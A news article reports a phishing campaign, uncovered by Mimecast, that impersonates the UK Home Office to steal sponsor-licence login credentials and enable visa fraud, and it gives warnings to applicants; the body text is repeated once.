A sophisticated phishing campaign is actively targeting UK organisations that hold sponsor licences by impersonating the Home Office, Mimecast Threat Research team has revealed. The attackers aim to steal login credentials for the Sponsorship Management System (SMS), which is used to manage visa sponsorships. This poses a significant risk of financial loss and data theft for affected organisations.
How the scam works
The campaign begins with phishing emails that closely mimic legitimate Home Office communications. These emails warn recipients about urgent compliance issues or potential account suspensions and include links to fraudulent websites. These sites are near-perfect copies of the official SMS login page, designed to harvest User IDs and passwords.
To bypass security filters, the attackers use captcha-gated URLs. After the user completes the captcha, they are redirected to the phishing page, which hotlinks official assets from the real site, making the fake login page very convincing. However, the form on the phishing page sends credentials to an attacker-controlled server rather than the legitimate Home Office system.
Consequences of compromised accounts
Once the attackers have obtained SMS login details, they exploit the compromised accounts in several ways. They may sell access on dark web marketplaces, issue fraudulent Certificates of Sponsorship (CoS), or carry out extortion schemes against the organisations. One common fraud involves creating fake job offers and charging victims between £15,000 and £20,000 for non-existent employment opportunities. This allows criminals to create seemingly legitimate visa documentation, enabling large-scale immigration fraud.
Impact on visa applicants
This phishing campaign also puts visa applicants at risk. Criminals using compromised SMS accounts can issue fake Certificates of Sponsorship, which support visa applications for jobs that do not exist. Applicants who fall prey to such scams may pay large sums for fake sponsorships, only to have their applications rejected or face legal complications. This undermines trust in the UK immigration system and harms genuine sponsors and applicants.
Applicants are advised to verify any job offers or sponsorships directly with the employer and through official Home Office channels. They should be cautious of unsolicited job offers demanding upfront payments and report suspicious communications to the Home Office or immigration authorities.
Sponsor licence holders and visa applicants alike must stay vigilant to protect themselves from these scams and maintain the integrity of the UK’s immigration process.
How the scam works
The campaign begins with phishing emails that closely mimic legitimate Home Office communications. These emails warn recipients about urgent compliance issues or potential account suspensions and include links to fraudulent websites. These sites are near-perfect copies of the official SMS login page, designed to harvest User IDs and passwords.
To bypass security filters, the attackers use captcha-gated URLs. After the user completes the captcha, they are redirected to the phishing page, which hotlinks official assets from the real site, making the fake login page very convincing. However, the form on the phishing page sends credentials to an attacker-controlled server rather than the legitimate Home Office system.
Consequences of compromised accounts
Once the attackers have obtained SMS login details, they exploit the compromised accounts in several ways. They may sell access on dark web marketplaces, issue fraudulent Certificates of Sponsorship (CoS), or carry out extortion schemes against the organisations. One common fraud involves creating fake job offers and charging victims between £15,000 and £20,000 for non-existent employment opportunities. This allows criminals to create seemingly legitimate visa documentation, enabling large-scale immigration fraud.
Impact on visa applicants
This phishing campaign also puts visa applicants at risk. Criminals using compromised SMS accounts can issue fake Certificates of Sponsorship, which support visa applications for jobs that do not exist. Applicants who fall prey to such scams may pay large sums for fake sponsorships, only to have their applications rejected or face legal complications. This undermines trust in the UK immigration system and harms genuine sponsors and applicants.
Applicants are advised to verify any job offers or sponsorships directly with the employer and through official Home Office channels. They should be cautious of unsolicited job offers demanding upfront payments and report suspicious communications to the Home Office or immigration authorities.
Sponsor licence holders and visa applicants alike must stay vigilant to protect themselves from these scams and maintain the integrity of the UK’s immigration process.
You may also like
Consider converting Noida to a metropolitan council: SC to UP
School bus carrying over 40 children crashes in Texas; multiple injuries reported
All cinemas must screen 1 Bengali film per day: Mamata Banerjee
Mary Berry's 'delicious' chicken lasagne can be whipped up in under 30 minutes
Uttar Pradesh Assembly Launches 24-Hour Debate On 'Vision Document-2047' Amid Opposition Protests
